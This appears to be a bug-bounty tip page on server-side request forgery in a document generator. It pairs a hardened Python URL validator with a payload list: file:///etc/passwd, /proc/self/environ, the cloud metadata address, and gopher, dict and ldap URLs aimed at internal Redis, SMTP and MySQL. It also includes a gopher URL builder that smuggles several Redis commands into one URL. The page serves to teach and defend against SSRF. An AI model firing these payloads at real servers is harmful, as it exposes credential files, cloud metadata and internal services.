Bug Bounty Tip: DocuGen fetches external content for your documents. The URL's format is validated, but any reachable destination is permitted, including internal services, file:// paths and cloud metadata endpoints. A format check alone is not an SSRF defence: the scheme has to be restricted and the destination checked after the hostname is resolved, not before.
Invoice #INV-2024-001 Draft
From
Acme Accounting LLC
123 Finance Street
New York, NY 10001
To
Acme Corp
456 Business Ave
San Francisco, CA 94102
Item                     Qty   Rate        Amount
Web Design Services        1   $2,500.00   $2,500.00
Hosting — Annual           1   $480.00     $480.00
Consulting — 10 Hours     10   $150.00     $1,500.00
Total                                      $4,480.00

Add External Content
DocuGen will fetch and preview the content before embedding it into the document.
Fetched Content
  • Terms of Service (legal.example.com, fetched 2024-06-01 11:16:05)
  • Company Logo (cdn.example.com, fetched 2024-06-01 11:15:22)
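As an added example (not DocuGen's code), here is the format-only check the tip describes next to a hardened destination check in Python. The DNS table is constructed so the example runs offline, and the names in it are hypothetical; the loopback, link-local and metadata addresses are the page's own targets. The hardened check restricts the scheme and port, rejects embedded credentials, resolves the host, refuses the fetch if any returned address is non-public, and returns the vetted addresses so the caller can connect to one of them instead of resolving again.

```python
import ipaddress
import socket
from typing import Callable, Dict, List, Optional
from urllib.parse import urlsplit

Resolver = Callable[[str], List[str]]
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def validate_format_only(url: str) -> bool:
    """The check the tip describes: the URL only has to parse with a scheme,
    so file:///etc/passwd and gopher://127.0.0.1:6379/_INFO both pass."""
    parts = urlsplit(url)
    return bool(parts.scheme) and bool(parts.netloc or parts.path)


class FetchRejected(ValueError):
    """Raised by vet_url with the reason a destination was refused."""


def system_resolver(host: str) -> List[str]:
    # Real DNS lookup returning every A/AAAA record, not just the first.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def make_table_resolver(table: Dict[str, List[str]]) -> Resolver:
    """Constructed offline resolver: IP literals resolve to themselves, names
    come from the table, anything else fails like NXDOMAIN."""
    def resolve(host: str) -> List[str]:
        try:
            return [str(ipaddress.ip_address(host))]
        except ValueError:
            if host not in table:
                raise socket.gaierror(f"constructed NXDOMAIN for {host}") from None
            return table[host]
    return resolve


def is_forbidden_address(ip_text: str) -> bool:
    """Deny loopback, RFC 1918, link-local (covers 169.254.169.254), IPv6 ULA,
    CGNAT, unspecified, reserved and multicast. IPv4-mapped IPv6 is unwrapped
    first so ::ffff:127.0.0.1 cannot slip past an IPv4-only denylist."""
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (not ip.is_global) or ip.is_multicast


def vet_url(url: str, resolve: Resolver = system_resolver) -> List[str]:
    """Hardened check. Returns the vetted addresses so the caller connects to
    one of them directly: resolving the name again at connect time would hand
    a DNS-rebinding attacker a lookup this check never saw."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise FetchRejected(f"scheme {scheme!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise FetchRejected("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise FetchRejected("missing host")
    try:
        port = parts.port
    except ValueError:
        raise FetchRejected("invalid port") from None
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise FetchRejected(f"port {port} not allowed")
    try:
        addresses = resolve(host)
    except OSError as exc:
        raise FetchRejected(f"cannot resolve {host!r}: {exc}") from None
    # Every record is checked: a name answering with one public and one
    # internal address is refused rather than trusting whichever comes first.
    for ip_text in addresses:
        if is_forbidden_address(ip_text):
            raise FetchRejected(f"{host!r} resolves to forbidden address {ip_text}")
    return addresses


def rejection_reason(url: str, resolve: Resolver = system_resolver) -> Optional[str]:
    """None if the URL may be fetched, otherwise why it was refused."""
    try:
        vet_url(url, resolve)
        return None
    except FetchRejected as exc:
        return str(exc)


# Constructed DNS answers for the offline run (hypothetical names).
DEMO_RESOLVER = make_table_resolver({
    "cdn.example.com": ["93.184.216.34"],
    "mixed.example.com": ["93.184.216.34", "10.0.0.5"],  # public plus RFC 1918
})

# The page's own payloads plus variants of the same idea.
DEMO_URLS = [
    "https://cdn.example.com/logo.png",
    "file:///etc/passwd",
    "gopher://127.0.0.1:6379/_INFO",
    "http://169.254.169.254/",
    "http://[::ffff:127.0.0.1]/",
    "http://mixed.example.com/",
    "http://cdn.example.com:6379/",
]


def demo() -> Dict[str, Optional[str]]:
    """Verdict (None means allowed) for each DEMO_URL under the constructed resolver."""
    return {url: rejection_reason(url, DEMO_RESOLVER) for url in DEMO_URLS}
```

Running `demo()` allows only the CDN logo and rejects everything else with a reason string. Two points matter in deployment: the addresses returned by `vet_url` must be what the HTTP client actually connects to (pin them, or re-check inside a connection hook), and redirects must be vetted with the same function, since a public host can answer 302 to an internal one.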
Where Bug Hunters Find This
Any product that fetches a user-supplied URL on the server side is a candidate. The product names below are examples of each category, not reports of vulnerabilities in those products.
  • Invoice / receipt generators (FreshBooks, QuickBooks, Stripe)
  • Website-to-PDF converters (wkhtmltopdf, WeasyPrint as a service)
  • Report builders with embedded content (Tableau, Power BI)
  • Document signing platforms fetching terms of service
  • Marketing automation fetching landing pages
  • Chatbot / AI tools fetching web content

Protocol Bypass Techniques
Which non-HTTP schemes reach the target depends on the fetching library. libcurl-based fetchers accept file://, gopher://, dict://, ldap:// and ftp:// unless the application restricts CURLOPT_PROTOCOLS, while HTTP-only clients such as Python requests or Go's net/http reject them outright. Try each scheme anyway: a "scheme not supported" error versus a connection timeout tells you which library sits behind the feature.
file:// Protocol
  • file:///etc/passwd
  • file:///proc/self/environ (process environment, which often carries credentials)
gopher:// Protocol
Everything after the one-character item type (the "_") is percent-decoded and written to the socket as-is, followed by CRLF, so a percent-encoded CRLF turns one URL into several lines of protocol.
  • gopher://127.0.0.1:6379/_INFO (Redis, which accepts inline commands terminated by CRLF)
  • gopher://127.0.0.1:25/_HELO (SMTP; RFC 5321 requires a hostname argument, so a strict server answers 501, but its banner still confirms the service)
dict:// Protocol
  • dict://127.0.0.1:3306/info (MySQL fingerprint: the server sends its version in the handshake greeting as soon as the connection opens, so the response reveals it whatever the command)
ldap:// Protocol
  • ldap://127.0.0.1:389/dc=internal (directory enum)
ftp:// Protocol
  • ftp://anonymous@127.0.0.1:21/ (internal FTP)
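To see why the gopher:// entries above work, here is an added Python model (not DocuGen's or curl's own code) of what a libcurl-style gopher fetch writes to the socket, together with a builder that packs several protocol lines into one URL. The decoding rule (drop the leading slash and the item-type character, percent-decode the rest, append CRLF) follows libcurl's behaviour; the query part of a gopher URL is not modelled. The hosts and ports are the page's own payloads, and `INFO server` is an ordinary Redis command.

```python
from typing import Dict, List
from urllib.parse import quote, unquote_to_bytes, urlsplit


def gopher_selector_bytes(url: str) -> bytes:
    """Model of a libcurl-style gopher fetch: the bytes written to the TCP
    socket for `url`. The path's leading "/" and the one-character item type
    (the "_" in the page's payloads) are dropped, the remainder is
    percent-decoded, and CRLF is appended. "/" and "/x" degenerate to an
    empty selector. The query part of the URL is ignored by this model."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        raise ValueError(f"not a gopher URL: {url!r}")
    path = parts.path
    selector = b"" if len(path) <= 2 else unquote_to_bytes(path[2:])
    return selector + b"\r\n"


def build_gopher_url(host: str, port: int, lines: List[str]) -> str:
    """Pack protocol lines into one gopher URL. Lines are joined with CRLF and
    everything outside the unreserved set is percent-encoded, so the CRLFs
    survive URL parsing and reappear on the wire. No trailing CRLF is added:
    the fetcher's own CRLF terminates the last line."""
    if any("\r" in line or "\n" in line for line in lines):
        raise ValueError("lines must not contain CR or LF")
    payload = "\r\n".join(lines)
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


# The page's own payloads.
PAGE_PAYLOADS = [
    "gopher://127.0.0.1:6379/_INFO",  # Redis
    "gopher://127.0.0.1:25/_HELO",    # SMTP
]


def wire_view(urls: List[str]) -> Dict[str, bytes]:
    """Map each gopher URL to the raw bytes the fetcher would send."""
    return {url: gopher_selector_bytes(url) for url in urls}


if __name__ == "__main__":
    for url, raw in wire_view(PAGE_PAYLOADS).items():
        print(f"{url}\n  -> {raw!r}")
    # Two Redis lines packed into one URL, then decoded again.
    multi = build_gopher_url("127.0.0.1", 6379, ["INFO server", "QUIT"])
    print(f"{multi}\n  -> {gopher_selector_bytes(multi)!r}")
```

The round trip is the point: `build_gopher_url` percent-encodes the CRLFs, the URL passes any "is this a well-formed URL" check, and `gopher_selector_bytes` shows them arriving at Redis as two separate inline commands. The same view explains the SMTP entry: `_HELO` reaches the server as `HELO\r\n` with no hostname argument.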